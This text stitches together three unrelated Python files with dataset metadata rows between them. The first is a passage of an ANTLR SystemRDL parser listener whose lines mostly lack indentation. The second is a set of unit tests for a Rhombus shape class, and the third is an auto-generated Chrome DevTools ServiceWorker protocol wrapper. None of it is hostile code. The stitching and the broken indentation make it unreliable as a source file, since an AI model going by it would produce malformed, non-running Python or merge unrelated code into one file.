def exitUnimplemented_property(self, ctx:SystemRDLParser.Unimplemented_propertyContext):
if enable_debug:
print("exitUnimplemented_property")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_rvalue_constant.
def enterProperty_rvalue_constant(self, ctx:SystemRDLParser.Property_rvalue_constantContext):
if enable_debug:
print("enterProperty_rvalue_constant")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_rvalue_constant.
def exitProperty_rvalue_constant(self, ctx:SystemRDLParser.Property_rvalue_constantContext):
if enable_debug:
print("exitProperty_rvalue_constant")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_modifier.
def enterProperty_modifier(self, ctx:SystemRDLParser.Property_modifierContext):
if enable_debug:
print("enterProperty_modifier")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_modifier.
def exitProperty_modifier(self, ctx:SystemRDLParser.Property_modifierContext):
if enable_debug:
print("exitProperty_modifier")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#id.
def enterId(self, ctx:SystemRDLParser.IdContext):
if enable_debug:
print("enterId")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#id.
def exitId(self, ctx:SystemRDLParser.IdContext):
if enable_debug:
print("exitId")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#num.
def enterNum(self, ctx:SystemRDLParser.NumContext):
if enable_debug:
print("enterNum")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#num.
def exitNum(self, ctx:SystemRDLParser.NumContext):
if enable_debug:
print("exitNum")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#str.
def enterStr(self, ctx:SystemRDLParser.StrContext):
if enable_debug:
print("enterStr")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#str.
def exitStr(self, ctx:SystemRDLParser.StrContext):
if enable_debug:
print("exitStr")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_def.
def enterEnum_def(self, ctx:SystemRDLParser.Enum_defContext):
if enable_debug:
print("enterEnum_def")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_def.
def exitEnum_def(self, ctx:SystemRDLParser.Enum_defContext):
if enable_debug:
print("exitEnum_def")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_body.
def enterEnum_body(self, ctx:SystemRDLParser.Enum_bodyContext):
if enable_debug:
print("enterEnum_body")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_body.
def exitEnum_body(self, ctx:SystemRDLParser.Enum_bodyContext):
if enable_debug:
print("exitEnum_body")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_entry.
def enterEnum_entry(self, ctx:SystemRDLParser.Enum_entryContext):
if enable_debug:
print("enterEnum_entry")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_entry.
def exitEnum_entry(self, ctx:SystemRDLParser.Enum_entryContext):
if enable_debug:
print("exitEnum_entry")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_property_assign.
def enterEnum_property_assign(self, ctx:SystemRDLParser.Enum_property_assignContext):
if enable_debug:
print("enterEnum_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_property_assign.
def exitEnum_property_assign(self, ctx:SystemRDLParser.Enum_property_assignContext):
if enable_debug:
print("exitEnum_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#ext_parms_root.
def enterExt_parms_root(self, ctx:SystemRDLParser.Ext_parms_rootContext):
if enable_debug:
print("enterExt_parms_root")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#ext_parms_root.
def exitExt_parms_root(self, ctx:SystemRDLParser.Ext_parms_rootContext):
if enable_debug:
print("exitExt_parms_root")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#ext_parm_defs.
def enterExt_parm_defs(self, ctx:SystemRDLParser.Ext_parm_defsContext):
if enable_debug:
print("enterExt_parm_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#ext_parm_defs.
def exitExt_parm_defs(self, ctx:SystemRDLParser.Ext_parm_defsContext):
if enable_debug:
print("exitExt_parm_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#global_defs.
def enterGlobal_defs(self, ctx:SystemRDLParser.Global_defsContext):
if enable_debug:
print("enterGlobal_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#global_defs.
def exitGlobal_defs(self, ctx:SystemRDLParser.Global_defsContext):
if enable_debug:
print("exitGlobal_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#global_parm_assign.
def enterGlobal_parm_assign(self, ctx:SystemRDLParser.Global_parm_assignContext):
if enable_debug:
print("enterGlobal_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#global_parm_assign.
def exitGlobal_parm_assign(self, ctx:SystemRDLParser.Global_parm_assignContext):
if enable_debug:
print("exitGlobal_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_in_defs.
def enterRdl_in_defs(self, ctx:SystemRDLParser.Rdl_in_defsContext):
if enable_debug:
print("enterRdl_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_in_defs.
def exitRdl_in_defs(self, ctx:SystemRDLParser.Rdl_in_defsContext):
if enable_debug:
print("exitRdl_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_in_parm_assign.
def enterRdl_in_parm_assign(self, ctx:SystemRDLParser.Rdl_in_parm_assignContext):
if enable_debug:
print("enterRdl_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_in_parm_assign.
def exitRdl_in_parm_assign(self, ctx:SystemRDLParser.Rdl_in_parm_assignContext):
if enable_debug:
print("exitRdl_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_in_defs.
def enterJspec_in_defs(self, ctx:SystemRDLParser.Jspec_in_defsContext):
if enable_debug:
print("enterJspec_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_in_defs.
def exitJspec_in_defs(self, ctx:SystemRDLParser.Jspec_in_defsContext):
if enable_debug:
print("exitJspec_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_in_parm_assign.
def enterJspec_in_parm_assign(self, ctx:SystemRDLParser.Jspec_in_parm_assignContext):
if enable_debug:
print("enterJspec_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_in_parm_assign.
def exitJspec_in_parm_assign(self, ctx:SystemRDLParser.Jspec_in_parm_assignContext):
if enable_debug:
print("exitJspec_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_out_defs.
def enterRdl_out_defs(self, ctx:SystemRDLParser.Rdl_out_defsContext):
if enable_debug:
print("enterRdl_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_out_defs.
def exitRdl_out_defs(self, ctx:SystemRDLParser.Rdl_out_defsContext):
if enable_debug:
print("exitRdl_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_out_parm_assign.
def enterRdl_out_parm_assign(self, ctx:SystemRDLParser.Rdl_out_parm_assignContext):
if enable_debug:
print("enterRdl_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_out_parm_assign.
def exitRdl_out_parm_assign(self, ctx:SystemRDLParser.Rdl_out_parm_assignContext):
if enable_debug:
print("exitRdl_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_out_defs.
def enterJspec_out_defs(self, ctx:SystemRDLParser.Jspec_out_defsContext):
if enable_debug:
print("enterJspec_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_out_defs.
def exitJspec_out_defs(self, ctx:SystemRDLParser.Jspec_out_defsContext):
if enable_debug:
print("exitJspec_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_out_parm_assign.
def enterJspec_out_parm_assign(self, ctx:SystemRDLParser.Jspec_out_parm_assignContext):
if enable_debug:
print("enterJspec_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_out_parm_assign.
def exitJspec_out_parm_assign(self, ctx:SystemRDLParser.Jspec_out_parm_assignContext):
if enable_debug:
print("exitJspec_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_out_defs.
def enterSystemverilog_out_defs(self, ctx:SystemRDLParser.Systemverilog_out_defsContext):
if enable_debug:
print("enterSystemverilog_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_out_defs.
def exitSystemverilog_out_defs(self, ctx:SystemRDLParser.Systemverilog_out_defsContext):
if enable_debug:
print("exitSystemverilog_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_out_parm_assign.
def enterSystemverilog_out_parm_assign(self, ctx:SystemRDLParser.Systemverilog_out_parm_assignContext):
if enable_debug:
print("enterSystemverilog_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_out_parm_assign.
def exitSystemverilog_out_parm_assign(self, ctx:SystemRDLParser.Systemverilog_out_parm_assignContext):
if enable_debug:
print("exitSystemverilog_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_wrapper_info.
def enterSystemverilog_wrapper_info(self, ctx:SystemRDLParser.Systemverilog_wrapper_infoContext):
if enable_debug:
print("enterSystemverilog_wrapper_info")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_wrapper_info.
def exitSystemverilog_wrapper_info(self, ctx:SystemRDLParser.Systemverilog_wrapper_infoContext):
if enable_debug:
print("exitSystemverilog_wrapper_info")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#systemverilog_wrapper_remap_command.
def enterSystemverilog_wrapper_remap_command(self, ctx:SystemRDLParser.Systemverilog_wrapper_remap_commandContext):
if enable_debug:
print("enterSystemverilog_wrapper_remap_command")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#systemverilog_wrapper_remap_command.
def exitSystemverilog_wrapper_remap_command(self, ctx:SystemRDLParser.Systemverilog_wrapper_remap_commandContext):
if enable_debug:
print("exitSystemverilog_wrapper_remap_command")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#uvmregs_out_defs.
def enterUvmregs_out_defs(self, ctx:SystemRDLParser.Uvmregs_out_defsContext):
if enable_debug:
print("enterUvmregs_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#uvmregs_out_defs.
def exitUvmregs_out_defs(self, ctx:SystemRDLParser.Uvmregs_out_defsContext):
if enable_debug:
print("exitUvmregs_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#uvmregs_out_parm_assign.
def enterUvmregs_out_parm_assign(self, ctx:SystemRDLParser.Uvmregs_out_parm_assignContext):
if enable_debug:
print("enterUvmregs_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#uvmregs_out_parm_assign.
def exitUvmregs_out_parm_assign(self, ctx:SystemRDLParser.Uvmregs_out_parm_assignContext):
if enable_debug:
print("exitUvmregs_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#reglist_out_defs.
def enterReglist_out_defs(self, ctx:SystemRDLParser.Reglist_out_defsContext):
if enable_debug:
print("enterReglist_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#reglist_out_defs.
def exitReglist_out_defs(self, ctx:SystemRDLParser.Reglist_out_defsContext):
if enable_debug:
print("exitReglist_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#reglist_out_parm_assign.
def enterReglist_out_parm_assign(self, ctx:SystemRDLParser.Reglist_out_parm_assignContext):
if enable_debug:
print("enterReglist_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#reglist_out_parm_assign.
def exitReglist_out_parm_assign(self, ctx:SystemRDLParser.Reglist_out_parm_assignContext):
if enable_debug:
print("exitReglist_out_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#bench_out_defs.
def enterBench_out_defs(self, ctx:SystemRDLParser.Bench_out_defsContext):
if enable_debug:
print("enterBench_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#bench_out_defs.
def exitBench_out_defs(self, ctx:SystemRDLParser.Bench_out_defsContext):
if enable_debug:
print("exitBench_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#bench_out_parm_assign.
    def enterBench_out_parm_assign(self, ctx:SystemRDLParser.Bench_out_parm_assignContext):
        if enable_debug:
            print("enterBench_out_parm_assign")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#bench_out_parm_assign.
    def exitBench_out_parm_assign(self, ctx:SystemRDLParser.Bench_out_parm_assignContext):
        if enable_debug:
            print("exitBench_out_parm_assign")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#xml_out_defs.
    def enterXml_out_defs(self, ctx:SystemRDLParser.Xml_out_defsContext):
        if enable_debug:
            print("enterXml_out_defs")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#xml_out_defs.
    def exitXml_out_defs(self, ctx:SystemRDLParser.Xml_out_defsContext):
        if enable_debug:
            print("exitXml_out_defs")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#xml_out_parm_assign.
    def enterXml_out_parm_assign(self, ctx:SystemRDLParser.Xml_out_parm_assignContext):
        if enable_debug:
            print("enterXml_out_parm_assign")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#xml_out_parm_assign.
    def exitXml_out_parm_assign(self, ctx:SystemRDLParser.Xml_out_parm_assignContext):
        if enable_debug:
            print("exitXml_out_parm_assign")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#model_annotation.
    def enterModel_annotation(self, ctx:SystemRDLParser.Model_annotationContext):
        if enable_debug:
            print("enterModel_annotation")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#model_annotation.
    def exitModel_annotation(self, ctx:SystemRDLParser.Model_annotationContext):
        if enable_debug:
            print("exitModel_annotation")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#annotation_command.
    def enterAnnotation_command(self, ctx:SystemRDLParser.Annotation_commandContext):
        if enable_debug:
            print("enterAnnotation_command")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#annotation_command.
    def exitAnnotation_command(self, ctx:SystemRDLParser.Annotation_commandContext):
        if enable_debug:
            print("exitAnnotation_command")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#implemented_rdl_property.
    def enterImplemented_rdl_property(self, ctx:SystemRDLParser.Implemented_rdl_propertyContext):
        if enable_debug:
            print("enterImplemented_rdl_property")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#implemented_rdl_property.
    def exitImplemented_rdl_property(self, ctx:SystemRDLParser.Implemented_rdl_propertyContext):
        if enable_debug:
            print("exitImplemented_rdl_property")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Enter a parse tree produced by SystemRDLParser#bool.
    def enterBool(self, ctx:SystemRDLParser.BoolContext):
        if enable_debug:
            print("enterBool")
            print(" |" + ctx.getText() + "|\n")
        pass

    # Exit a parse tree produced by SystemRDLParser#bool.
    def exitBool(self, ctx:SystemRDLParser.BoolContext):
        if enable_debug:
            print("exitBool")
            print(" |" + ctx.getText() + "|\n")
        pass
| 38.142981 | 119 | 0.657973 | 4,755 | 44,017 | 5.834911 | 0.044585 | 0.06066 | 0.055145 | 0.099261 | 0.917679 | 0.897639 | 0.865525 | 0.850424 | 0.813696 | 0.796396 | 0 | 0.000391 | 0.244815 | 44,017 | 1,153 | 120 | 38.176062 | 0.834271 | 0.227003 | 0 | 0.594524 | 1 | 0 | 0.120625 | 0.070323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.198175 | false | 0.198175 | 0.003911 | 0 | 0.20339 | 0.396349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
111b9d09b72220de7a27bc2c92354daf7459eaaa | 4,565 | py | Python | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | shapes/rhombus_test.py | daniilzelekson/programming-2021-19fpl | 79e35be77ccb911b0d928f186be8bf0066229718 | [
"MIT"
] | null | null | null | """
Programming for linguists
Tests for Rhombus class.
"""
import unittest
from shapes.rhombus import Rhombus
class RhombusTestCase(unittest.TestCase):
"""
This Case of tests checks the functionality of the implementation of Rhombus
"""
def test_id(self):
"""
Creates a Rhombus.
Tests that the correct uid is returned.
"""
rhombus = Rhombus(228, 10, 10)
self.assertEqual(rhombus.get_uid(), 228)
def test_square_area(self):
"""
Creates a Rhombus with equal diagonals(Square).
Tests that the area is calculated correctly.
"""
rhombus = Rhombus(0, 5, 5)
self.assertEqual(rhombus.get_area(), 12.5)
def test_area(self):
"""
Creates a Rhombus.
Tests that the area is calculated correctly.
"""
rhombus = Rhombus(0, 5, 3)
self.assertEqual(rhombus.get_area(), 7.5)
def test_perimeter(self):
"""
Creates a Rhombus.
Tests that the perimeter is calculated correctly.
"""
rhombus = Rhombus(0, 6, 8)
self.assertEqual(rhombus.get_perimeter(), 20)
def test_height(self):
"""
Creates a Rhombus.
Tests that the height is calculated correctly.
"""
rhombus = Rhombus(0, 6, 8)
self.assertEqual(rhombus.get_height(), 4.8)
def test_square_perimeter(self):
"""
Creates a Rhombus with equal diagonals(Square).
Tests that the perimeter is calculated correctly.
"""
rhombus = Rhombus(0, 10, 10)
self.assertLess(abs(rhombus.get_perimeter() - 28.28), 0.1)
def test_uid_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus('j', 8, 8)
print(rhombus.get_height())
def test_diagonal1_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(1, 'gg', 8)
print(rhombus.get_height())
def test_diagonal2_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(4, 8, 'gg')
print(rhombus.get_height())
def test_all_bad_input(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus('r', 'i', 'p')
print(rhombus.get_height())
def test_uid_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(-1, 8, 8)
print(rhombus.get_height())
def test_diagonal1_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(1, -1, 8)
print(rhombus.get_height())
def test_diagonal2_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(4, 8, -1)
print(rhombus.get_height())
def test_all_bad_value(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(ValueError):
rhombus = Rhombus(-1, -1, -1)
print(rhombus.get_height())
def test_diagonals_bad_value_boolean(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(1, True, True)
print(rhombus.get_height())
def test_uid_bad_value_boolean(self):
"""
Creates a Rhombus.
Tests that the rhombus can be created with only normal arguments.
"""
with self.assertRaises(TypeError):
rhombus = Rhombus(True, 1, 1)
print(rhombus.get_height())
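The `Rhombus` class exercised above lives in `shapes/rhombus.py`, which is outside this chunk. A minimal sketch consistent with the assertions (area = d1·d2/2, side length from the half-diagonals, height = area/side) might look like the following — only the method names and expected values come from the tests; the constructor and validation details are my assumptions:

```python
import math


class Rhombus:
    """Hypothetical rhombus defined by a uid and its two diagonals."""

    def __init__(self, uid, diagonal1, diagonal2):
        for value in (uid, diagonal1, diagonal2):
            # bool is a subclass of int, so reject it explicitly
            if isinstance(value, bool) or not isinstance(value, (int, float)):
                raise TypeError('uid and diagonals must be numbers')
        if uid < 0 or diagonal1 <= 0 or diagonal2 <= 0:
            raise ValueError('uid must be non-negative and diagonals positive')
        self.uid = uid
        self.diagonal1 = diagonal1
        self.diagonal2 = diagonal2

    def get_uid(self):
        return self.uid

    def get_area(self):
        # the area of a rhombus is half the product of its diagonals
        return self.diagonal1 * self.diagonal2 / 2

    def get_perimeter(self):
        # each side is the hypotenuse of the two half-diagonals
        return 4 * math.hypot(self.diagonal1 / 2, self.diagonal2 / 2)

    def get_height(self):
        # area also equals side * height
        return self.get_area() / (self.get_perimeter() / 4)
```

With this sketch, `Rhombus(0, 6, 8)` gives side 5, perimeter 20 and height 4.8, matching `test_perimeter` and `test_height` above.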
| 29.642857 | 84 | 0.58598 | 529 | 4,565 | 4.950851 | 0.149338 | 0.042764 | 0.07331 | 0.116075 | 0.830851 | 0.798778 | 0.789996 | 0.740359 | 0.716686 | 0.663994 | 0 | 0.021536 | 0.31851 | 4,565 | 153 | 85 | 29.836601 | 0.820315 | 0.312596 | 0 | 0.360656 | 0 | 0 | 0.003059 | 0 | 0 | 0 | 0 | 0 | 0.262295 | 1 | 0.262295 | false | 0 | 0.032787 | 0 | 0.311475 | 0.163934 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
115f48eb452c0f36b1aa09079d7e4368b5ed5208 | 8,410 | py | Python | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 5 | 2018-11-10T01:02:23.000Z | 2020-08-13T19:02:08.000Z | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 2 | 2018-11-10T01:01:42.000Z | 2018-11-10T01:02:53.000Z | cripy/protocol/serviceworker.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 3 | 2019-11-01T21:17:51.000Z | 2021-07-16T02:58:53.000Z | """This is an auto-generated file. Modify at your own risk"""
from typing import Awaitable, Any, Callable, Dict, List, Optional, Union, TYPE_CHECKING

if TYPE_CHECKING:
    from cripy import ConnectionType, SessionType

__all__ = ["ServiceWorker"]


class ServiceWorker:
    """
    Status: Experimental

    See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker`
    """

    __slots__ = ["client"]

    def __init__(self, client: Union["ConnectionType", "SessionType"]) -> None:
        """Initialize a new instance of ServiceWorker

        :param client: The client instance to be used to communicate with the remote browser instance
        """
        self.client: Union["ConnectionType", "SessionType"] = client

    def deliverPushMessage(
        self, origin: str, registrationId: str, data: str
    ) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-deliverPushMessage`

        :param origin: The origin
        :param registrationId: The registrationId
        :param data: The data
        :return: The results of the command
        """
        return self.client.send(
            "ServiceWorker.deliverPushMessage",
            {"origin": origin, "registrationId": registrationId, "data": data},
        )

    def disable(self) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-disable`

        :return: The results of the command
        """
        return self.client.send("ServiceWorker.disable", {})

    def dispatchSyncEvent(
        self, origin: str, registrationId: str, tag: str, lastChance: bool
    ) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-dispatchSyncEvent`

        :param origin: The origin
        :param registrationId: The registrationId
        :param tag: The tag
        :param lastChance: The lastChance
        :return: The results of the command
        """
        return self.client.send(
            "ServiceWorker.dispatchSyncEvent",
            {
                "origin": origin,
                "registrationId": registrationId,
                "tag": tag,
                "lastChance": lastChance,
            },
        )

    def enable(self) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-enable`

        :return: The results of the command
        """
        return self.client.send("ServiceWorker.enable", {})

    def inspectWorker(self, versionId: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-inspectWorker`

        :param versionId: The versionId
        :return: The results of the command
        """
        return self.client.send("ServiceWorker.inspectWorker", {"versionId": versionId})

    def setForceUpdateOnPageLoad(self, forceUpdateOnPageLoad: bool) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-setForceUpdateOnPageLoad`

        :param forceUpdateOnPageLoad: The forceUpdateOnPageLoad
        :return: The results of the command
        """
        return self.client.send(
            "ServiceWorker.setForceUpdateOnPageLoad",
            {"forceUpdateOnPageLoad": forceUpdateOnPageLoad},
        )

    def skipWaiting(self, scopeURL: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-skipWaiting`

        :param scopeURL: The scopeURL
        :return: The results of the command
        """
        return self.client.send("ServiceWorker.skipWaiting", {"scopeURL": scopeURL})

    def startWorker(self, scopeURL: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-startWorker`

        :param scopeURL: The scopeURL
        :return: The results of the command
        """
        return self.client.send("ServiceWorker.startWorker", {"scopeURL": scopeURL})

    def stopAllWorkers(self) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-stopAllWorkers`

        :return: The results of the command
        """
        return self.client.send("ServiceWorker.stopAllWorkers", {})

    def stopWorker(self, versionId: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-stopWorker`

        :param versionId: The versionId
        :return: The results of the command
        """
        return self.client.send("ServiceWorker.stopWorker", {"versionId": versionId})

    def unregister(self, scopeURL: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-unregister`

        :param scopeURL: The scopeURL
        :return: The results of the command
        """
        return self.client.send("ServiceWorker.unregister", {"scopeURL": scopeURL})

    def updateRegistration(self, scopeURL: str) -> Awaitable[Dict]:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#method-updateRegistration`

        :param scopeURL: The scopeURL
        :return: The results of the command
        """
        return self.client.send(
            "ServiceWorker.updateRegistration", {"scopeURL": scopeURL}
        )

    def workerErrorReported(
        self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
    ) -> Any:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerErrorReported`

        :param listener: Optional listener function
        :return: If a listener was supplied the return value is a callable that
         will remove the supplied listener otherwise a future that resolves
         with the value of the event
        """
        event_name = "ServiceWorker.workerErrorReported"
        if listener is None:
            future = self.client.loop.create_future()

            def _listener(event: Optional[Dict] = None) -> None:
                future.set_result(event)

            self.client.once(event_name, _listener)

            return future

        self.client.on(event_name, listener)
